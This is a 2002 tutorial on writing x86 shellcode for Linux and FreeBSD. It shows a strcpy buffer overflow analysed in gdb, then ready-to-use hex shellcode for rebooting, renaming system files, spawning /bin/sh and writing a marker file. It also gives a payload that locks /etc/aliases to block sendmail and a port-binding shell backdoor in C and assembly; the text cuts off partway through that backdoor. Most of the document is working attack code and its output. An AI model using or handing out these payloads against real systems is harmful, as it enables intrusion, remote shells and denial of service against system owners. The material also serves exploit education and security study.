Author: zillion (safemode.org) Date: 10-04-2002
I wrote this document for the purpose of self-education and made it public so that it might be useful to others. This is not the type of document from which you can expect to learn shellcode development in 21 hours ;-) If you are completely new to this subject, try playing with assembly a bit and take it easy with this file.
The shellcodes presented here have all been tested and can be used in most exploits without a problem. However, these codes may cause serious damage to your computer and should therefore only be used against TEST systems that have NO network connectivity! Imagine what happens if you run the backdoor on your system and forget about it....
If you have any comments or questions please feel free to mail them to me!
zillion
I prefer using nasm to compile assembly code and the examples used in this document are all written in the nasm syntax. Using nasm to compile the assembly code can be done as follows:
nasm -o prog prog.S
After executing this command, the file 'prog' will contain our binary data that we will translate to the shellcode. At this point you will not be able to execute this data directly from command line. You can use the utility that is placed at the end of this document. Usage of this tool will look like this:
gcc -o s-proc s-proc.c
bash-2.04$ ./s-proc -e prog
Calling code ...
sh-2.04$ exit
bash-2.04$ ./s-proc -p prog
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41"
"\x42\x42\x42\x42";
bash-2.04$
Shellcode can be seen as a list of instructions that has been developed in a manner that allows it to be injected in an application during runtime.
Injecting shellcode into an application can be done through many different security holes, of which buffer overflows are the most popular. In order to explain how shellcode is used, I will give a small buffer overflow example using the following C program:
#include <string.h>

int main(int argc, char **argv, char **envp)
{
    char array[200];
    strcpy(array, argv[1]);   /* no bounds check: this is the overflow */
    return 0;
}
If we compile this (gcc -o overflow overflow.c) and execute it with a very large string of characters we can overwrite memory:
On linux:
[root@droopy done]# ./overflow `perl -e 'print "A" x 220'`BBBB
Segmentation fault (core dumped)
[root@droopy done]#
On FreeBSD:
[root@freebsd done]# ./overflow `perl -e 'print "A" x 204'`BBBB
Segmentation fault (core dumped)
[root@freebsd done]#
Well that doesn't look good now does it ? ;-) It appears that we forced some memory corruption with the 220 A's and 4 B's that were given to the program as an argument. That argument exceeded the size of the array, and as a result the data that was stored behind the array got overwritten. You can see what happened by using gdb (the GNU debugger) to analyze the core dump file. Output generated by gdb often looks very scary to newcomers, but have no fear.. there is a manual. BTW if you did not get a core dump, try more A's or raise the core size limit to a number such as 99999 ( ulimit -c 99999 )
[root@droopy done]# gdb -core=core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) info all
eax     0xbffff990   -1073743472
ecx     0xfffffdc3   -573
edx     0xbffffcad   -1073742675
ebx     0x4013b824   1075034148
esp     0xbffffa70   0xbffffa70
ebp     0x41414141   0x41414141
esi     0xbffffad4   -1073743148
edi     0x0          0
eip     0x42424242   0x42424242
eflags  0x10286      66182
cs      0x23         35
ss      0x2b         43
ds      0x2b         43
es      0x2b         43
fs      0x2b         43
gs      0x2b         43
st0     0 (raw 0x00000000000000000000)
st1     0 (raw 0x00000000000000000000)
st2     0 (raw 0x00000000000000000000)
st3     0 (raw 0x00000000000000000000)
st4     0 (raw 0x00000000000000000000)
st5     0 (raw 0x00000000000000000000)
st6     0 (raw 0x00000000000000000000)
st7     0 (raw 0x00000000000000000000)
fctrl   0x0          0
fstat   0x0          0
ftag    0x0          0
fiseg   0x0          0
fioff   0x0          0
foseg   0x0          0
fooff   0x0          0
fop     0x0          0
So by using GDB we can see the contents of all registers at the time 'overflow' got killed. The most important registers here are EBP and EIP. Both are 32 bit registers (32/8 = 4 bytes each), and together they hold the last 8 bytes of our argument. The 'ebp' and 'eip' lines in the above gdb output show that memory was overwritten with data we control. EBP holds the value 0x41414141. 0x41 is the hex value for 'A', meaning that EBP contains AAAA. The EIP register holds 0x42424242. 0x42 is the hex value of 'B', meaning that EIP holds BBBB.
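The step from a register value to the characters it holds can be checked with a few lines of C. This is only a small sketch; the function name reg_to_ascii is made up for this illustration and is not part of any tool used in this document.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: writes the four bytes of a 32-bit register value
 * into out[0..3] in memory order (x86 is little-endian, so the lowest
 * byte comes first) and NUL-terminates the result.
 * out must have room for 5 bytes. */
void reg_to_ascii(uint32_t value, char out[5])
{
    assert(out != NULL);
    for (int i = 0; i < 4; i++)
        out[i] = (char)((value >> (8 * i)) & 0xff);
    out[4] = '\0';
}
```

Calling reg_to_ascii(0x41414141, buf) leaves "AAAA" in buf, and 0x42424242 gives "BBBB", which matches what gdb reported for EBP and EIP.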
You can also use gdb to examine more memory by using the 'x' command. In this case we can see our buffer by using the command 'x/150 $esp', which is the same as 'x/150 0xbffffa70' because 0xbffffa70 is the value of the ESP register:
(gdb) x/150 $esp
0xbffffa70: 0x00000000 0xbffffad4 0xbffffae0 0x0804830e
0xbffffa80: 0x080482e4 0x4013b824 0xbffffaa8 0x40037b4c
0xbffffa90: 0x00000000 0xbffffae0 0x4013a358 0x40016638
0xbffffaa0: 0x00000002 0x08048380 0x00000000 0x080483a1
0xbffffab0: 0x0804845c 0x00000002 0xbffffad4 0x080482e4
0xbffffac0: 0x080484cc 0x4000df24 0xbffffacc 0x40016c0c
0xbffffad0: 0x00000002 0xbffffbc1 0xbffffbcc 0x00000000
0xbffffae0: 0xbffffcad 0xbffffcce 0xbffffced 0xbffffd0f
0xbffffaf0: 0xbffffd1b 0xbffffede 0xbffffefd 0xbfffff13
0xbffffb00: 0xbfffff1e 0xbfffff2d 0xbfffff35 0xbfffff45
0xbffffb10: 0xbfffff53 0xbfffff64 0xbfffff6f 0xbfffff80
0xbffffb20: 0xbfffffa3 0xbfffffb6 0xbfffffc3 0x00000000
0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffb40: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffb50: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffb60: 0x00000009 0x08048380 0x0000000b 0x00000000
0xbffffb70: 0x0000000c 0x00000000 0x0000000d 0x00000000
0xbffffb80: 0x0000000e 0x00000000 0x00000010 0x0080f9ff
0xbffffb90: 0x0000000f 0xbffffbbc 0x00000000 0x00000000
0xbffffba0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb0: 0x00000000 0x00000000 0x00000000 0x36383669
0xbffffbc0: 0x6f2f2e00 0x66726576 0x00776f6c 0x41414141
0xbffffbd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc00: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc10: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc30: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc40: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc50: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc80: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffca0: 0x41414141 0x41414141 0x42424242 0x44575000
0xbffffcb0: 0x6f682f3d 0x6e2f656d 0x736c6569 0x6f7a2f68
0xbffffcc0: 0x722f656e 0x79646165
(gdb)
Here we can see that the values that ended up in EBP and EIP are located directly behind each other. What most exploits do is put an address in EIP (the instruction pointer) that points to instructions they have placed in the buffer that caused the overflow. Instructions ?? hey that includes our shellcode !! ;-)
The Intel x86 general purpose registers are 32 bits wide, and their lower parts can also be addressed as 16 bit and 8 bit registers. When developing shellcode you will find out that using the smallest registers often prevents having NULL bytes in the code. Using the right register for the right value should also be considered effective programming. I mean would you put a mouse in a cage that was created for an elephant ?? I thought so ! ;p . Now let's have a look at the registers that we will be using.
32 Bit | 16 Bit | 8 Bit (High) | 8 Bit (Low) |
EAX | AX | AH | AL |
EBX | BX | BH | BL |
ECX | CX | CH | CL |
EDX | DX | DH | DL |
EAX, AX, AH and AL are called the 'Accumulator' registers and can be used for I/O port access, arithmetic, interrupt calls etc. Later in this document you will see that we use these registers to select system calls.
EBX, BX, BH, and BL are the 'Base' registers and are used as base pointers for memory access. You will see later on that we use this register to store pointers for arguments of system calls. Note that the return value of a system call comes back in EAX, not EBX. An example of this can be seen with the 'open' system call: when you have opened a file, the file descriptor, which can be used for I/O with the opened file, is returned in EAX. The examples in this document then copy it into EBX, because the following system calls expect it there as their first argument.
ECX, CX, CH, and CL are also known as the 'Counter' registers. In the examples of this document you will see a loop that uses CL as a counter and some examples that use ECX to store pointers.
EDX, DX, DH, and DL are called the 'Data' registers and can be used for I/O port access, arithmetic and some interrupt calls.
When you want to execute a system call you will have to use these registers to prepare the system call. A very simple example is the exit(0) syscall:
mov al, 0x01    ; The syscall number for exit
xor ebx, ebx    ; EBX will now contain the value 0
int 0x80        ; and activate !

It is important to always use the smallest register available to store your data in. This avoids NULL bytes in the shellcode. (Keep in mind that 'mov al' only sets the lowest byte of EAX, which is why the later examples clear EAX with 'xor eax, eax' first.) For example, if we would use the following exit code:

BITS 32
; exit(0) code
mov eax, 0x01   ; The syscall number for exit
xor ebx, ebx    ; EBX will now contain the value 0
int 0x80        ; and activate !

The register 'eax' is too large for our single byte: the assembler encodes the value 1 as a full 32 bit immediate, with the result that NULL bytes will exist in our shellcode:

su-2.05a# s-proc -p exit
char shellcode[] =
"\xb8\x01\x00\x00\x00\x31\xdb\xcd\x80";

By using 'ndisasm', which is part of the nasm package, we can see how the large register is translated. Note that ndisasm decodes as 16 bit code by default, which is why it shows ax and bx here; 'ndisasm -b 32 exit' decodes the same bytes as 32 bit code.

su-2.05a# ndisasm exit
00000000 B80100 mov ax,0x1
00000003 0000 add [bx+si],al
00000005 31DB xor bx,bx
00000007 CD80 int 0x80
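Checking for NULL bytes by eye gets tedious with longer code, so it can help to let a small C function do it. The following is a minimal sketch; the name first_null_byte is invented for this example and is not part of s-proc.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: returns the index of the first 0x00 byte in
 * code[0..len-1], or -1 if the buffer contains no NULL byte. */
long first_null_byte(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}
```

For the 'mov eax, 0x01' version ("\xb8\x01\x00\x00\x00\x31\xdb\xcd\x80") this returns 2, the position of the first zero in the 32 bit immediate. For the 'mov al, 0x01' version ("\xb0\x01\x31\xdb\xcd\x80") it returns -1. Pass the length explicitly (for example with sizeof) instead of using strlen(), since strlen() would stop at the very byte you are looking for.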
In most cases of shellcode you cannot use hardcoded memory addresses. So in order to know where your data is located, you'll need to do a little trick:

jmp short stuff
code:
pop esi
<data>
stuff:
call code
db 'This is my string#'

What you see in the above code is that we 'jmp' from the beginning of the code to 'stuff', from where we 'call code'. The 'call' pushes the address of the next item, which is our string, on the stack as a return address. At the beginning of 'code' we 'pop esi'. Now esi will represent the location of the string 'This is my string'. In the above sample [esi + 1] represents 'h' from the word 'This'.
NULL bytes are string delimiters and kill shellcode. If you created shellcode that contains such bytes: don't bother using it and try to fix the problem. Since you cannot have NULL bytes in the shellcode, you will have to add them at runtime. We have seen in the above example how to get the location of bytes in our string, so we can do this:

jmp short stuff
code:
pop esi
xor eax,eax             ; doing this will make eax NULL
mov byte [esi + 14],al  ; put a null byte on [esi + 14]
stuff:
call code
db 'This is my string#'

In the above example we replace '#' with a NULL byte and terminate the string 'This is my string' at run time. Counting from zero, the '#' is the 15th character of the string and therefore lives at [esi + 14]. For clean coding purposes I find it best to alter your strings at the beginning of your assembly code. Please note that NULL bytes are not the only problem! Other bytes such as newlines and special characters can also cause problems!
Don't run this code on a production system ! Sync brings the on-disk state of the file system in sync with the internal state of the file system. We have to put this in front of the reboot() syscall to avoid loss of data that hasn't yet been written to the hard disk. Using this code can of course still result in data loss, because active processes are *not* terminated properly before the reboot. Since we don't need to alter any data in this code, there is no need to find out from what location we are working:
BITS 32
pop esi
xor eax, eax
mov al,36
int 0x80
mov al,36
int 0x80
mov al, 88
mov ebx, 0xfee1dead
mov ecx, 672274793
mov edx, 0x1234567
int 0x80
Shellcode produced by this assembly code:
[root@droopy doc]# nasm -o reboot reboot.S
[root@droopy doc]# s-proc -p reboot
char shellcode[] =
"\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad"
"\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
The FreeBSD code for this is much simpler and doesn't require you to add sync() in front of it:
BITS 32
xor eax,eax
mov dx,9998
sub dx,9990
mov al, 55
int 0x80

The FreeBSD shellcode created by this code:

char shellcode[] =
"\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
Additionally FreeBSD also has many more different flags for reboots which you can use to do some funky stuff ;-) see: /usr/include/sys/reboot.h for more information.
The rename syscall looks like this (taken from 'man rename'):

int rename(const char *oldpath, const char *newpath);

So in order to use this syscall successfully we need two pointers, one to the old and one to the new file name. To get the address of a string we can use 'lea' in assembly.

BITS 32
jmp short callit
doit:
pop esi
xor eax, eax
mov byte [esi + 9], al    ; terminate arg 1
mov byte [esi + 24], al   ; terminate arg 2
mov byte al, 38           ; the syscall rename = 38
lea ebx, [esi]            ; put the address of /etc/motd (esi) in ebx
lea ecx, [esi + 10]       ; put the address of /etc/ooops.txt (esi + 10) in ecx
int 0x80                  ; We have everything ready so lets call the kernel
mov al, 0x01              ; prepare to exit()
xor ebx, ebx              ; clean up
int 0x80                  ; and exit !
callit:
call doit
db '/etc/motd#/etc/ooops.txt#'

Please note that the 'db' line can also be formatted like this, it doesn't make any difference:

db '/etc/motd#'
db '/etc/ooops.txt#'

Shellcode produced from this assembly code, after we compiled it, will look like this:
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x88\x46\x18\xb0\x26\x8d\x1e" "\x8d\x4e\x0a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe3\xff\xff" "\xff\x2f\x65\x74\x63\x2f\x6d\x6f\x74\x64\x23\x2f\x65\x74\x63" "\x2f\x6f\x6f\x6f\x70\x73\x2e\x74\x78\x74\x23";
Execve is the almighty system call that can be used to execute a file. The linux implementation looks like this:
int execve (const char *filename, char *const argv [], char *const envp[]);
So what we need is to get 3 pointers, one to our filename, one to the arguments array and one to environment array. Since we are not interested in the environment array we will use NULL for it. We will implement this execve as follows:
execve("pointer to string /bin/sh","pointer to /bin/sh","pointer to NULL");
BITS 32
jmp short callit          ; jmp trick as explained above
doit:
pop esi                   ; esi now represents the location of our string
xor eax, eax              ; make eax 0
mov byte [esi + 7], al    ; terminate /bin/sh
lea ebx, [esi]            ; get the address of /bin/sh and put it in register ebx
mov long [esi + 8], ebx   ; put the value of ebx (the address of /bin/sh) in AAAA ([esi + 8])
mov long [esi + 12], eax  ; put NULL in BBBB (remember xor eax, eax)
mov byte al, 0x0b         ; Execution time! we use syscall 0x0b which represents execve
mov ebx, esi              ; argument one... ratatata /bin/sh
lea ecx, [esi + 8]        ; argument two... ratatata our pointer to /bin/sh
lea edx, [esi + 12]       ; argument three... ratataa our pointer to NULL
int 0x80
callit:
call doit                 ; part of the jmp trick to get the location of db
db '/bin/sh#AAAABBBB'
Note that the characters #AAAABBBB only reserve space: the '#' is replaced by the terminating NULL byte, and AAAA and BBBB are overwritten at run time with the pointer to /bin/sh and the NULL pointer. You could leave them out of the shellcode, but then these writes land in whatever memory follows the string, which can corrupt memory and cause the shellcode to fail. This assembly code can be used to create the following shellcode:

char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41"
"\x42\x42\x42\x42";
In the above example the system call number is stored in eax and the arguments in the CPU registers ebx, ecx and edx. This is how Linux likes it. On *BSD systems arguments are given to system calls by pushing them on the stack. Below is an example of an execve syscall on FreeBSD:
BITS 32
jmp short callit
doit:
pop esi
xor eax, eax
mov byte [esi + 7], al
push eax
push eax
push esi
mov al,59
push eax
int 0x80
callit:
call doit
db '/bin/sh'
And the result:
su-2.05a# s-proc -p execve
char shellcode[] =
"\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
"\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
su-2.05a# s-proc -e execve
Calling code ...
#
From the execve man page:

int execve (const char *filename, char *const argv [], char *const envp[]);

So we need a pointer to our file name, to the argument array and to the environment array. The last one may also be replaced with NULL, and that is what we will do ;-) Remember.. you can use execve for any program !

BITS 32
jmp short callit
doit:
; Part one: Manipulate the string defined after 'db'
pop esi                   ; esi now represents our string
xor eax, eax
mov byte [esi + 7], al    ; put a null byte after /bin/sh and thus terminate the string
mov byte [esi + 10], al   ; ditto, but after -i
; Part two: Prepare the arguments for our system call
mov long [esi + 11], esi  ; store the address of /bin/sh in AAAA
lea ebx, [esi + 8]        ; get the address of -i and put it in ebx
mov long [esi + 15], ebx  ; store that address in [esi + 15] -> BBBB
mov long [esi + 19], eax  ; put NULL in CCCC
; Part three: Prepare execution and execute
mov byte al, 0x0b         ; 0x0b is the execve system call
mov ebx, esi              ; ebx = argument 1
lea ecx, [esi + 11]       ; arguments pointer
lea edx, [esi + 19]       ; environment pointer
int 0x80
mov al, 0x01
xor ebx, ebx
int 0x80
callit:
call doit
db '/bin/sh#-i#AAAABBBBCCCC'

[root@droopy execve-2]# nasm -o execve execve.S
[root@droopy execve-2]# s-proc -p execve
char shellcode[] =
"\xeb\x27\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
"\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
"\x8d\x56\x13\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x69\x23\x41\x41\x41"
"\x41\x42\x42\x42\x42\x43\x43\x43\x43";
[root@droopy execve-2]# s-proc -e execve
Calling code ...
sh-2.04#
Again we will use the following definition:

int execve (const char *filename, char *const argv [], char *const envp[]);

And our goal is as follows:

int execve (AAAA,pointer to array AAAABBBBCCCC,DDDD);

BITS 32
jmp short callit
doit:
pop esi
xor eax, eax
mov byte [esi + 7], al    ; terminate /bin/sh
mov byte [esi + 10], al   ; terminate -c
mov byte [esi + 18], al   ; terminate /bin/ls
mov long [esi + 20], esi  ; address of /bin/sh in AAAA
lea ebx, [esi + 8]        ; get address of -c
mov long [esi + 24], ebx  ; store address of -c in BBBB
lea ebx, [esi + 11]       ; get address of /bin/ls
mov long [esi + 28], ebx  ; store address of /bin/ls in CCCC
mov long [esi + 32], eax  ; put NULL in DDDD
mov byte al, 0x0b         ; prepare the execution, we use syscall 0x0b (execve)
mov ebx, esi              ; program
lea ecx, [esi + 20]       ; argument array (/bin/sh -c /bin/ls)
lea edx, [esi + 32]       ; NULL
int 0x80                  ; call the kernel to look at our stuff ;-)
callit:
call doit
db '/bin/sh#-c#/bin/ls#AAAABBBBCCCCDDDD'

[root@droopy execve-3]# s-proc -p execve
char shellcode[] =
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x12\x89"
"\x76\x14\x8d\x5e\x08\x89\x5e\x18\x8d\x5e\x0b\x89\x5e\x1c\x89"
"\x46\x20\xb0\x0b\x89\xf3\x8d\x4e\x14\x8d\x56\x20\xcd\x80\xe8"
"\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
"\x2f\x62\x69\x6e\x2f\x6c\x73\x23\x41\x41\x41\x41\x42\x42\x42"
"\x42\x43\x43\x43\x43\x44\x44\x44\x44";
[root@droopy execve-3]# s-proc -e execve
Calling code ...
execve execve.S
[root@droopy execve-3]#
BITS 32
jmp short callit
doit:
pop esi
xor eax, eax
mov byte [esi + 14], al   ; terminate /tmp/owned.txt
mov byte [esi + 29],0xa   ; 0xa == newline
mov byte [esi + 30], al   ; terminate niels was here
lea ebx, [esi + 15]       ; get address
mov long [esi + 31], ebx  ; put the address of niels--here in xxxx
mov al, 5                 ; the syscall open() = 5
lea ebx, [esi]            ; argument #1
mov cx, 1090              ; 1024 (append) + 64 (create if no exist) + 2 rw
mov dx, 744q              ; if we need to create, these are the permissions
int 0x80                  ; kernel int
mov long ebx,eax          ; get the descriptor
mov al, 4
mov ecx,[esi + 31]        ; the location of our data
mov dx, 15                ; the size of our data
int 0x80                  ; kernel interrupt
mov al, 6                 ; the close syscall = 6
int 0x80                  ; clozzzz
mov al, 0x01              ; exit system call
xor ebx, ebx              ; clean up
int 0x80                  ; and bail out
callit:
call doit
db '/tmp/owned.txt#'
db 'niels was here #xxxx'

Now this code will generate the following shellcode:

sh-2.04$ ../../../process open shellcode
Calling code ...
bash-2.05$ cat shellcode
char shellcode[] =
"\xeb\x38\x5e\x31\xc0\x88\x46\x0e\xc6\x46\x1d\x0a\x88\x46\x1e"
"\x8d\x5e\x0f\x89\x5e\x1f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66"
"\xba\xe4\x01\xcd\x80\x89\xc3\xb0\x04\x8b\x4e\x1f\x66\xba\x0f"
"\x00\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3"
"\xff\xff\xff\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e\x74"
"\x78\x74\x23\x6e\x69\x65\x6c\x73\x20\x77\x61\x73\x20\x68\x65"
"\x72\x65\x20\x23\x78\x78\x78\x78";
bash-2.05$

As you can see there is a NULL byte in it, and thus this shellcode cannot be used. So let's find out what the problem is by using ndisasm.
bash-2.04$ ndisasm open
00000000 EB38 jmp short 0x3a
00000002 5E pop si
00000003 31C0 xor ax,ax
00000005 88460E mov [bp+0xe],al
00000008 C6461D0A mov byte [bp+0x1d],0xa
0000000C 88461E mov [bp+0x1e],al
0000000F 8D5E0F lea bx,[bp+0xf]
00000012 895E1F mov [bp+0x1f],bx
00000015 B005 mov al,0x5
00000017 8D1E66B9 lea bx,[0xb966]
0000001B 42 inc dx
0000001C 0466 add al,0x66
0000001E BAE401 mov dx,0x1e4
00000021 CD80 int 0x80
00000023 89C3 mov bx,ax
00000025 B004 mov al,0x4
00000027 8B4E1F mov cx,[bp+0x1f]
0000002A 66BA0F00CD80 mov edx,0x80cd000f <-- beh !
00000030 B006 mov al,0x6
00000032 CD80 int 0x80
00000034 B001 mov al,0x1
00000036 31DB xor bx,bx
00000038 CD80 int 0x80
0000003A E8C3FF call 0x0
0000003D FF db 0xFF
0000003E FF2F jmp far [bx]
00000040 746D jz 0xaf
00000042 702F jo 0x73
00000044 6F outsw
00000045 776E ja 0xb5
00000047 65642E7478 cs jz 0xc4
0000004C 7423 jz 0x71
0000004E 6E outsb
0000004F 69656C7320 imul sp,[di+0x6c],0x2073
00000054 7761 ja 0xb7
00000056 7320 jnc 0x78
00000058 686572 push word 0x7265
0000005B 652023 and [gs:bp+di],ah
0000005E 7878 js 0xd8
00000060 7878 js 0xda

As you might have already seen, the number of bytes we want to write is causing the problem: the value 15 is stored as the 16 bit immediate 0F 00, and the 00 is our NULL byte. That means the following line needs a fix:

mov dx, 15

We can fix that by using the following trick:

mov dx,9995 ; A trick to get 15 in dx without getting null bytes
sub dx,9980

So what we do is store 9995 in dx and subtract 9980 from it. As a result dx will contain 15, which is exactly the number of bytes we want to write to the opened file. After correcting this error we get the following shellcode:

char shellcode[] =
"\xeb\x39\x5e\x31\xc0\x88\x46\x0e\x88\x46\x1e\x8d\x5e\x0f\x89"
"\x5e\x1f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01\xcd"
"\x80\x89\xc3\xb0\x04\x8b\x4e\x1f\x66\xba\x0b\x27\x66\x81\xea"
"\xfc\x26\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8"
"\xc2\xff\xff\xff\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e"
"\x74\x78\x74\x23\x6e\x69\x65\x6c\x73\x20\x77\x61\x73\x20\x68"
"\x65\x72\x65\x20\x23\x78\x78\x78\x78";
And gone is the null byte ! ;-)
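The arithmetic behind the 9995 / 9980 trick can be checked in C before assembling anything. This is a sketch under the assumption that only the two 16 bit immediates matter; the function names has_zero_byte16 and is_null_free_pair are invented for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: returns 1 if the low or the high byte of a
 * 16-bit immediate is 0x00, else 0. */
int has_zero_byte16(uint16_t imm)
{
    return (imm & 0x00ff) == 0 || (imm & 0xff00) == 0;
}

/* Hypothetical helper: returns 1 if "mov dx, a" followed by
 * "sub dx, b" leaves target in dx and neither immediate contains
 * a zero byte, else 0. */
int is_null_free_pair(uint16_t a, uint16_t b, uint16_t target)
{
    return (uint16_t)(a - b) == target
        && !has_zero_byte16(a)
        && !has_zero_byte16(b);
}
```

has_zero_byte16(15) is 1, because 15 is 0x000f and the high byte is zero. 9995 is 0x270b and 9980 is 0x26fc, so neither contains a zero byte and their difference is 15. These are the bytes \x0b\x27 and \xfc\x26 that show up in the corrected shellcode.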
This shellcode abused a weakness in sendmail that can prevent that application from being able to work properly. More information about that issue can be found here: http://www.sendmail.org/LockingAdvisory.txt BITS 32 jmp short callit doit: pop esi xor ebx,ebx ; Make sure the registers we use xor eax,eax ; are clean mov eax,0x2 ; 0x2 is fork(). This function returns int 0x80 ; A process ID to the parent and a 0 to the ; child process. We can test on this and let test eax,eax ; the parent process exit. This is an important jnz exit ; test which can be crucial with forking bind ; shellcode. (man fork) xor eax,eax mov [esi + 12],al ; Terminate /etc/aliases mov ecx,eax ; ecx = 0 mov ebx,esi ; The ebx register will contain the mov al,5 ; location of our data which is 'esi' int 0x80 ; we open() the file and safe the returned xor ebx,ebx ; file descriptor in ebx after cleaning this mov ebx,eax ; register with xor. mov cl,0x2 ; We want an exclusively lock mov al,143 ; flock() int 0x80 ; call kernel and make the lock a fact sub cl,0x3 ; Start a infinite loop to make sure l00p: ; that sendmail cannot access the file js l00p callit: call doit db '/etc/aliases' exit: ; Exit will get called in the parent process xor eax,eax ; This is not really needed I guess you can just mov al,1 ; let it crash to safe space ;-) int 0x80 ; Execute !! ;-))
While port binding shellcode looks very complex, it isn't really that hard to write. It is very much like the above example: several system calls in a row, some of which use information that was returned by an earlier one (I introduced this in the above example). When writing more complex code it can help to first write it in C. In this case I just took the C source of the port binding shellcode that Taeho Oh wrote for his shellcode document and made some minor changes to it. The assembly code generated from this C source is of course homebrewn and works like a charm on FreeBSD.
#include<unistd.h> #include<sys/socket.h> #include<netinet/in.h> int soc,cli; struct sockaddr_in serv_addr; int main() { if(fork()==0) { serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=0xAAAA; soc=socket(2,1,6); bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,1); cli=accept(soc,0,0); dup2(cli,0); dup2(cli,1); dup2(cli,2); execve("/bin/sh",0,0); } }
The assembly code I generated from this C source:
BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 7], al ; Terminate the /bin/sh string mov al,2 ; The fork() system call int 0x80 ; We call the kernel to fork us. ; ; Next code: socket(2,1,6) push byte 0x06 ; The 3e argument push byte 0x01 ; The 2e argument push byte 0x02 ; The 1e argument mov al,97 ; The system call number push eax ; int 0x80 ; And call the kernel ; ; Next code: bind(soc,(struct sockaddr *)&serv_addr,0x10); mov edx,eax ; We store the file descriptor that was returned from socket() in edx xor eax,eax ; Now we will create the sockaddr_in structure mov byte [esi + 9],0x02 ; This equals: serv_addr.sin_family=2 mov word [esi + 10],0xAAAA ; This equals: serv_addr.sin_port=0xAAAA mov long [esi + 12],eax ; This equals: serv_addr.sin_addr.s_addr=0 push byte 0x10 ; We now start with pushing the arguments, 0x10 is the 3e one. lea eax,[esi + 8] ; Get the address of our structure, arg 2 of bind() is a pointer. push eax ; And push it on the stack, our second argument is a fact push edx ; And we push the last argument, the file descriptor, on the stack xor eax,eax ; Clean up mov al,104 ; System call 104 represents bind. push eax ; int 0x80 ; And call the kernel ; ; Next code: listen(soc,1); push byte 0x1 ; We push the first argument on the stack push edx ; We push the filedescriptor that is still stored in the edx register xor eax,eax ; Cleanup mov al,106 ; System call 106 represents listen push eax ; int 0x80 ; And call the kernel ; ; Next code: accept(soc,0,0); xor eax,eax ; We need zero's for the arguments. push eax ; Push the last argument, a zero push eax ; Push the second argument, another zero push edx ; Push the first argument, the file descriptor of our socket mov al,30 ; Define the system call we like to use, accept() push eax ; int 0x80 ; And call the kernel to process our data ; ; Next code: dup2(cli,0) , dup2(cli,1) and dup2(cli,2) ; We will do this in a loop since this creates smaller code. 
